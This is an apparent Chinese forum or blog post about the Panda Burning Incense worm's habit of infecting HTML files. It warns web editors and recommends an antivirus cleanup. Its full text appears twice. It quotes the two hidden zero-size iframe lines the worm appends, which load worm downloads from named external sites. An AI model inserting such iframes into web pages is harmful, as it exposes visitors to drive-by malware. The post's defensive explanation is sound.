发现询问熊猫烧香病毒的越来越多,除了变种太多外,发现这个感染型病毒还有个重要特征,它可以感染HTML文件,在感染过的HTML文件末尾加了两行
</html>< src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></i>
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
这两行修改就会导致你访问该html文件时,浏览器会尝试从[url]http://www.ctv163.com/wuhan/down.htm[/url]或[url]http://www.krvkr.com/worm.htm[/url]下载程序,一般情况下,IE这个时候会有安全提示。
如果刚好,你的IE安全等级比较低,或者,你的内部intranet站点服务器被熊猫烧香感染了,而你的内部站点可能刚好在你的IE信任列表中,那就危险了。浏览器会自动下载并执行来自[url]http://www.krvkr.com/worm.htm[/url] 或[url]http://www.ctv163.com/wuhan/down.htm[/url]站点的危险程序,而这个程序可能是熊猫的最新变种。
另外,熊猫还有部分变种可以直接下载更新,这个够狠吧。病毒在线更新,变种源源不断。
还有个非常重要的原因,我们的法律对病毒制作者、传播者太放任了,完全是可以关闭上面提到的两个网站的呀。
中了熊猫一定要快速处理,对于网站编辑,这点尤其重要,一旦网站编辑人员的电脑被熊猫感染,意味着,你的带毒Web页可能会上传到服务器,而重新镜像一个新的Web页要花更多的时间。
另外,补充一点,毒霸已经把HTML文档中病毒修改的那行加入病毒库了,可以直接删除HTML文件末尾的病毒特征,网编要是中了,就用毒霸把你的web文档检查一下。
</html>< src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></i>
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
这两行修改就会导致你访问该html文件时,浏览器会尝试从[url]http://www.ctv163.com/wuhan/down.htm[/url]或[url]http://www.krvkr.com/worm.htm[/url]下载程序,一般情况下,IE这个时候会有安全提示。
如果刚好,你的IE安全等级比较低,或者,你的内部intranet站点服务器被熊猫烧香感染了,而你的内部站点可能刚好在你的IE信任列表中,那就危险了。浏览器会自动下载并执行来自[url]http://www.krvkr.com/worm.htm[/url] 或[url]http://www.ctv163.com/wuhan/down.htm[/url]站点的危险程序,而这个程序可能是熊猫的最新变种。
另外,熊猫还有部分变种可以直接下载更新,这个够狠吧。病毒在线更新,变种源源不断。
还有个非常重要的原因,我们的法律对病毒制作者、传播者太放任了,完全是可以关闭上面提到的两个网站的呀。
中了熊猫一定要快速处理,对于网站编辑,这点尤其重要,一旦网站编辑人员的电脑被熊猫感染,意味着,你的带毒Web页可能会上传到服务器,而重新镜像一个新的Web页要花更多的时间。
另外,补充一点,毒霸已经把HTML文档中病毒修改的那行加入病毒库了,可以直接删除HTML文件末尾的病毒特征,网编要是中了,就用毒霸把你的web文档检查一下。